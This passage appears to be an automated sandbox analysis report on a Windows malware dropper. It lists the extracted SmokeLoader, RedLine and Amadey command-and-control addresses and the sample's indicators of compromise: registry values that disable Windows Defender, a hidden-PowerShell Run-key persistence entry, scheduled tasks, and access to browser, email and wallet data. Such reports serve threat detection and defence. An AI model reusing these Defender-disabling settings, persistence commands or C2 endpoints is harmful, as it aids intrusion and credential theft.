Analysis
-
max time kernel
92s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
24/10/2023, 03:32
Static task
static1
General
-
Target
file.exe
-
Size
1.5MB
-
MD5
3d944b41372e2a4a704bbbf5b89ccf9c
-
SHA1
30e23bcb4cf18e2219b3c70458b869f07803789e
-
SHA256
3e5032c14ef4e2ec54b7c1c3749ecc61de06dfc2acc78d2ffed5a5cf9a9ce203
-
SHA512
080177a707f8503d2669b01ccc9f419674c69199881e66cda686cd9beea533e2284747c6ddfac1a91d3f90e8273736d0dbc31661da4ca1c3f3c4911e9641bcee
-
SSDEEP
49152:6LWwN3zjFX2QkeHqYVk+FvqR3czxhqVE0Q1:8WwltX/kCnvzWVE0Q
Malware Config
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
grome
77.91.124.86:19084
Extracted
amadey
3.89
http://77.91.124.1/theme/index.php
-
install_dir
fefffe8cea
-
install_file
explothe.exe
-
strings_key
36a96139c1118a354edf72b1080d4b2f
Extracted
redline
kinza
77.91.124.86:19084
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Signatures
-
DcRat 4 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" file.exe 5832 schtasks.exe 4344 schtasks.exe 4356 schtasks.exe -
Glupteba payload 8 IoCs
resource yara_rule behavioral2/memory/5972-670-0x0000000002E70000-0x000000000375B000-memory.dmp family_glupteba behavioral2/memory/5972-677-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5972-741-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5972-802-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5972-846-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5972-868-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/4332-1029-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/4332-1078-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 11D2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 11D2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 11D2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 11D2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 11D2.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
resource yara_rule behavioral2/memory/4084-51-0x0000000000400000-0x000000000043E000-memory.dmp family_redline behavioral2/memory/2232-477-0x0000000002100000-0x000000000215A000-memory.dmp family_redline behavioral2/memory/5676-478-0x00000000003D0000-0x000000000040E000-memory.dmp family_redline behavioral2/memory/2232-567-0x0000000000400000-0x000000000047E000-memory.dmp family_redline behavioral2/memory/5396-647-0x00000000005A0000-0x00000000005FA000-memory.dmp family_redline behavioral2/memory/3372-698-0x0000000000410000-0x000000000046A000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 5348 created 3272 5348 latestX.exe 26 PID 5348 created 3272 5348 latestX.exe 26 PID 5348 created 3272 5348 latestX.exe 26 PID 5348 created 3272 5348 latestX.exe 26 -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts latestX.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 880 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation 6NR6Cu4.exe Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation 4180.exe Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation kos2.exe Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation K.exe Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation 6D2A.exe Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation 5YC8Gc0.exe Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation explothe.exe -
Executes dropped EXE 42 IoCs
pid Process 4404 Ha4Ha21.exe 3496 FM3vI91.exe 1076 nE5Ky95.exe 2604 Ac7YA91.exe 5048 1hk24dD4.exe 4908 2my3348.exe 1232 3kL08dC.exe 2452 4LK852dG.exe 1184 5YC8Gc0.exe 696 explothe.exe 2512 6NR6Cu4.exe 5504 B07.exe 4964 Co9bS0tM.exe 4116 fi0TE8LZ.exe 2464 C70.exe 2512 yw4Qa1zI.exe 5724 F31.exe 5860 LA5JJ4ee.exe 5912 1fS14XO6.exe 5968 11D2.exe 4760 1482.exe 2232 17BF.exe 5676 2Eg054Ci.exe 5160 explothe.exe 1048 4180.exe 4160 4394.exe 5664 46C1.exe 2496 toolspub2.exe 5972 31839b57a4f11171d6abc8bbc4451ee4.exe 1592 kos2.exe 5348 latestX.exe 5396 4C7F.exe 3872 set16.exe 6084 K.exe 6032 is-SCTOF.tmp 1240 toolspub2.exe 5232 5663.exe 3372 5A2D.exe 5164 MyBurn.exe 2856 MyBurn.exe 1636 6D2A.exe 4332 31839b57a4f11171d6abc8bbc4451ee4.exe -
Loads dropped DLL 16 IoCs
pid Process 6032 is-SCTOF.tmp 6032 is-SCTOF.tmp 6032 is-SCTOF.tmp 5396 4C7F.exe 5396 4C7F.exe 1500 rundll32.exe 1044 MsiExec.exe 5384 rundll32.exe 5384 rundll32.exe 5384 rundll32.exe 5384 rundll32.exe 5384 rundll32.exe 5384 rundll32.exe 5384 rundll32.exe 5520 rundll32.exe 860 MsiExec.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 11D2.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\4394.exe'\"" 4394.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" file.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" Ha4Ha21.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" FM3vI91.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" Ac7YA91.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" B07.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" Co9bS0tM.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" fi0TE8LZ.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" nE5Ky95.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" yw4Qa1zI.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" LA5JJ4ee.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 5048 set thread context of 3780 5048 1hk24dD4.exe 94 PID 2452 set thread context of 4084 2452 4LK852dG.exe 102 PID 5912 set thread context of 1236 5912 1fS14XO6.exe 169 PID 2496 set thread context of 1240 2496 toolspub2.exe 188 -
Drops file in Program Files directory 12 IoCs
description ioc Process File created C:\Program Files (x86)\MyBurn\is-QHD6O.tmp is-SCTOF.tmp File created C:\Program Files (x86)\MyBurn\is-0M6MV.tmp is-SCTOF.tmp File created C:\Program Files (x86)\MyBurn\is-SAACL.tmp is-SCTOF.tmp File created C:\Program Files (x86)\MyBurn\is-T2SAP.tmp is-SCTOF.tmp File created C:\Program Files (x86)\MyBurn\is-BMBNI.tmp is-SCTOF.tmp File created C:\Program Files (x86)\MyBurn\Sounds\is-PG2UV.tmp is-SCTOF.tmp File created C:\Program Files (x86)\MyBurn\Sounds\is-QIVL8.tmp is-SCTOF.tmp File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat is-SCTOF.tmp File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe is-SCTOF.tmp File created C:\Program Files (x86)\MyBurn\unins000.dat is-SCTOF.tmp File created C:\Program Files (x86)\MyBurn\is-G6O6E.tmp is-SCTOF.tmp File created C:\Program Files (x86)\MyBurn\is-UAGA3.tmp is-SCTOF.tmp -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIFBEF.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{9F5963CF-43BE-D076-A507-48D899BA38B5} msiexec.exe File opened for modification C:\Windows\Installer\MSIFEA0.tmp msiexec.exe File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune 4C7F.exe File created C:\Windows\Installer\e58f623.msi msiexec.exe File opened for modification C:\Windows\Installer\e58f623.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe -
Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5812 sc.exe 4056 sc.exe 5912 sc.exe 2644 sc.exe 3792 sc.exe 5764 sc.exe 4940 sc.exe 5136 sc.exe 5928 sc.exe 1388 sc.exe 5500 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 916 1236 WerFault.exe 169 1172 5396 WerFault.exe 183 -
Checks SCSI registry key(s) 3 TTPs 11 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000ce060165ac6eec080000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000ce0601650000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900ce060165000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dce060165000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000ce06016500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3kL08dC.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3kL08dC.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3kL08dC.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4356 schtasks.exe 5832 schtasks.exe 4344 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created 